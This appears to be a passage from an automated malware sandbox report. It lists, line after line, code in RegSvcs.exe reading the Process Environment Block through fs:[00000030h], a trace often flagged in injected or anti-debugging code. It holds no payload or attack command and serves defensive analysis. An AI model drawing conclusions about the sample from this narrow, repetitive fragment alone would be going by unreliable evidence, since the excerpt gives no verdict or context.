Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402A0 mov eax, dword ptr fs:[00000030h]	7_2_011402A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h]	7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h]	7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h]	7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h]	7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h]	7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h]	7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E59C mov eax, dword ptr fs:[00000030h]	7_2_0116E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132582 mov eax, dword ptr fs:[00000030h]	7_2_01132582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132582 mov ecx, dword ptr fs:[00000030h]	7_2_01132582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A580 mov ecx, dword ptr fs:[00000030h]	7_2_0112A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A580 mov eax, dword ptr fs:[00000030h]	7_2_0112A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164588 mov eax, dword ptr fs:[00000030h]	7_2_01164588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011545B1 mov eax, dword ptr fs:[00000030h]	7_2_011545B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011545B1 mov eax, dword ptr fs:[00000030h]	7_2_011545B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011365D0 mov eax, dword ptr fs:[00000030h]	7_2_011365D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0116A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0116A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E5CF mov eax, dword ptr fs:[00000030h]	7_2_0116E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E5CF mov eax, dword ptr fs:[00000030h]	7_2_0116E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011325E0 mov eax, dword ptr fs:[00000030h]	7_2_011325E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C5ED mov eax, dword ptr fs:[00000030h]	7_2_0116C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C5ED mov eax, dword ptr fs:[00000030h]	7_2_0116C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h]	7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h]	7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h]	7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A430 mov eax, dword ptr fs:[00000030h]	7_2_0116A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h]	7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h]	7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h]	7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C427 mov eax, dword ptr fs:[00000030h]	7_2_0112C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115245A mov eax, dword ptr fs:[00000030h]	7_2_0115245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A471 mov eax, dword ptr fs:[00000030h]	7_2_0113A471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h]	7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h]	7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h]	7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC460 mov ecx, dword ptr fs:[00000030h]	7_2_011BC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011644B0 mov ecx, dword ptr fs:[00000030h]	7_2_011644B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011264BA mov eax, dword ptr fs:[00000030h]	7_2_011264BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BA4B0 mov eax, dword ptr fs:[00000030h]	7_2_011BA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011364AB mov eax, dword ptr fs:[00000030h]	7_2_011364AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011304E5 mov ecx, dword ptr fs:[00000030h]	7_2_011304E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130710 mov eax, dword ptr fs:[00000030h]	7_2_01130710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160710 mov eax, dword ptr fs:[00000030h]	7_2_01160710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C700 mov eax, dword ptr fs:[00000030h]	7_2_0116C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116273C mov eax, dword ptr fs:[00000030h]	7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116273C mov ecx, dword ptr fs:[00000030h]	7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116273C mov eax, dword ptr fs:[00000030h]	7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AC730 mov eax, dword ptr fs:[00000030h]	7_2_011AC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C720 mov eax, dword ptr fs:[00000030h]	7_2_0116C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C720 mov eax, dword ptr fs:[00000030h]	7_2_0116C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130750 mov eax, dword ptr fs:[00000030h]	7_2_01130750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE75D mov eax, dword ptr fs:[00000030h]	7_2_011BE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172750 mov eax, dword ptr fs:[00000030h]	7_2_01172750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172750 mov eax, dword ptr fs:[00000030h]	7_2_01172750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4755 mov eax, dword ptr fs:[00000030h]	7_2_011B4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A740 mov eax, dword ptr fs:[00000030h]	7_2_0112A740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116674D mov esi, dword ptr fs:[00000030h]	7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116674D mov eax, dword ptr fs:[00000030h]	7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116674D mov eax, dword ptr fs:[00000030h]	7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138770 mov eax, dword ptr fs:[00000030h]	7_2_01138770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011307AF mov eax, dword ptr fs:[00000030h]	7_2_011307AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B07C3 mov eax, dword ptr fs:[00000030h]	7_2_011B07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C7F0 mov eax, dword ptr fs:[00000030h]	7_2_0116C7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011347FB mov eax, dword ptr fs:[00000030h]	7_2_011347FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011347FB mov eax, dword ptr fs:[00000030h]	7_2_011347FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h]	7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h]	7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h]	7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE7E1 mov eax, dword ptr fs:[00000030h]	7_2_011BE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172619 mov eax, dword ptr fs:[00000030h]	7_2_01172619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE609 mov eax, dword ptr fs:[00000030h]	7_2_011AE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E627 mov eax, dword ptr fs:[00000030h]	7_2_0114E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01166620 mov eax, dword ptr fs:[00000030h]	7_2_01166620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168620 mov eax, dword ptr fs:[00000030h]	7_2_01168620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113262C mov eax, dword ptr fs:[00000030h]	7_2_0113262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114C640 mov eax, dword ptr fs:[00000030h]	7_2_0114C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162674 mov eax, dword ptr fs:[00000030h]	7_2_01162674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A660 mov eax, dword ptr fs:[00000030h]	7_2_0116A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A660 mov eax, dword ptr fs:[00000030h]	7_2_0116A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114266C mov eax, dword ptr fs:[00000030h]	7_2_0114266C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134690 mov eax, dword ptr fs:[00000030h]	7_2_01134690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134690 mov eax, dword ptr fs:[00000030h]	7_2_01134690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C68B mov eax, dword ptr fs:[00000030h]	7_2_0116C68B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011666B0 mov eax, dword ptr fs:[00000030h]	7_2_011666B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C6A6 mov eax, dword ptr fs:[00000030h]	7_2_0116C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A6C7 mov ebx, dword ptr fs:[00000030h]	7_2_0116A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A6C7 mov eax, dword ptr fs:[00000030h]	7_2_0116A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B06F1 mov eax, dword ptr fs:[00000030h]	7_2_011B06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B06F1 mov eax, dword ptr fs:[00000030h]	7_2_011B06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC912 mov eax, dword ptr fs:[00000030h]	7_2_011BC912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128918 mov eax, dword ptr fs:[00000030h]	7_2_01128918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128918 mov eax, dword ptr fs:[00000030h]	7_2_01128918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE908 mov eax, dword ptr fs:[00000030h]	7_2_011AE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE908 mov eax, dword ptr fs:[00000030h]	7_2_011AE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B892A mov eax, dword ptr fs:[00000030h]	7_2_011B892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A950 mov eax, dword ptr fs:[00000030h]	7_2_0116A950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0946 mov eax, dword ptr fs:[00000030h]	7_2_011B0946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC97C mov eax, dword ptr fs:[00000030h]	7_2_011BC97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h]	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h]	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h]	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117096E mov eax, dword ptr fs:[00000030h]	7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117096E mov edx, dword ptr fs:[00000030h]	7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117096E mov eax, dword ptr fs:[00000030h]	7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B89B3 mov esi, dword ptr fs:[00000030h]	7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B89B3 mov eax, dword ptr fs:[00000030h]	7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B89B3 mov eax, dword ptr fs:[00000030h]	7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011309AD mov eax, dword ptr fs:[00000030h]	7_2_011309AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011309AD mov eax, dword ptr fs:[00000030h]	7_2_011309AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011649D0 mov eax, dword ptr fs:[00000030h]	7_2_011649D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011629F9 mov eax, dword ptr fs:[00000030h]	7_2_011629F9
